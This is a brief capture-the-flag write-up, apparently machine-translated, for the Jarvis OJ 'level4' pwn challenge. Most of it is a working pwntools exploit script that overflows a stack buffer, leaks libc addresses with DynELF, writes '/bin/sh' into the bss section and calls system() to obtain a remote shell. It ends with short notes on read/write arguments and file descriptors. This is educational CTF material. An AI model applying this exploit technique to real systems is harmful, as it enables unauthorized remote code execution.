Topics address
https://dn.jarvisoj.com/challengefiles/level4.0f9cfa0b7bb6c0f9e030a5541b46e9f0
Link
https://www.anquanke.com/post/id/85129
DynELF new skills to master the use of pwntools
Get address system by Thinking DynELF, writes '/ bin / sh' bss section, and acquires parameter passing mode overflow shell
EXP follows
from pwn import * r=remote('pwn2.jarvisoj.com',9880) e=ELF('./level4') write_plt=e.symbols['write'] read_plt=e.symbols['read'] func=e.symbols['vulnerable_function'] bss_addr=0x804a024 def leak(address): payload1='a'*(0x88+0x4)+p32(write_plt)+p32(func)+p32(0x1)+p32(address)+p32(0x4) r.sendline(payload1) leak_address=r.recv(4) return leak_address d=DynELF(leak,elf=ELF('./level4')) sys_addr=d.lookup('system','libc') payload2='a'*(0x88+0x4)+p32(read_plt)+p32(func)+p32(0x0)+p32(bss_addr)+p32(0x8) r.sendline(payload2) r.sendline('/bin/sh') payload3='a'*(0x88+0x4)+p32(sys_addr)+'a'*0x4+p32(bss_addr) r.sendline(payload3) r.interactive()
read and write the parameter passing sequence (fd, addr, len) i.e. (file descriptor entry address, input \ output length)
Wherein the file descriptor 0 indicates the standard input stream stdin, 1 represents the standard output stream stdout